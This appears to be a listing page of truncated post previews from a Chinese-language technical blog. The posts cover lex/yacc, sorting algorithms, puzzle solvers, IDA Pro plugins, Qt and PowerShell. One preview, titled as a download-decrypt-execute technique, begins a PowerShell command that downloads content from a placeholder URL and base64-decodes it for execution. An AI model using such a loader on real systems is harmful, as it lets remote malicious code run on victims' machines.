原创 [lex與yacc第二版] ch03-03

本文主要是ch03-03的編譯過程: ch03-3.l %{ #include "y.tab.h" #include <math.h> extern double vbltable[26]; %} %% ([0-9]+|([0-9]*

原创 lex 與yacc 第二版 源碼編譯使用

參考: https://blog.csdn.net/XiaoPANGXia/article/details/44132693   資源鏈接: https://download.csdn.net/download/lacoucou/1247

原创 算法圖解 學習筆記

1.快速排序 import random def quick_sort(ary): #基線條件:爲空或者只包含一個元素的數組是"有序"的 if len(ary)<2: return ary el

原创 powershell base64 xor

下載解密執行一條龍:  $b=$(New-Object Net.WebClient).DownloadString('hxxp://xxx.xx.xx/xx'); $d=[System.Convert]::FromBase64Strin

原创 cefpython3 獲取頁面加載過程中的所有訪問鏈接

目前cefpython3的最新版本是 v66.0 ,最高支持python3.7 .   API: https://github.com/cztomczak/cefpython/blob/master/api/API-categories.

原创 Flow Free solver[連線遊戲求解器]

Fast automated solver for Flow Free puzzles written in C.  用C語言編寫的連線遊戲的快速自動求解器。 GIF of the final program in action (see

原创 連線遊戲求解器

github:https://github.com/imos/Puzzle/blob/master/NumberLink/numberlink_solver_v1.cc 這個短小精湛,好編譯,速度也不慢。 // numberlink_s

原创 python 2.7 安裝 pycoast

1.執行安裝命令 pip install pycosat 安裝出錯 Complete output (9 lines): running install running build running build

原创 Tiny microcode optimizer 【微碼優化器 】

注:ida pro7.4及以後版本纔有這功能。 It is not a surprise to hear the IDA and Decompiler cannot handle all possible cases and eventu

原创 IDA PRO 2019年插件大賽作品[Plug-In Contest 2019: Hall Of Fame]

This year again, we have examined the plugins of 9 contestants, and once again the scope, and focus of the plugins we e

原创 QTableView 多字段排序

前序文章: 多字段排序      https://blog.csdn.net/lacoucou/article/details/105569434 QSortFilterProxyModel 子類化排序研究   https://blog.

原创 QSortFilterProxyModel 子類化排序研究

本例中重要包含qtablevie,MyModel(QAbstractTableModel的子類),mysortmodel(QSortFilterProxyModel)的子類。 觸發排序的途徑主要由一下幾種: 1.點擊QTableView的

原创 powershell 算法

1.AES #加密 $key="aes256keyaes256keyaes256keyaes25"; $test="1111111111111111111111111111111111111111111111111" $aes_obj

原创 powershell 教程及資源收集

1.教程 https://docs.microsoft.com/zh-cn/powershell/scripting/getting-started/getting-started-with-windows-powershell?view

原创 win7 powershell 調試

win7默認的powershell版本爲2.0,此文所用的powershell版本爲: Name                           Value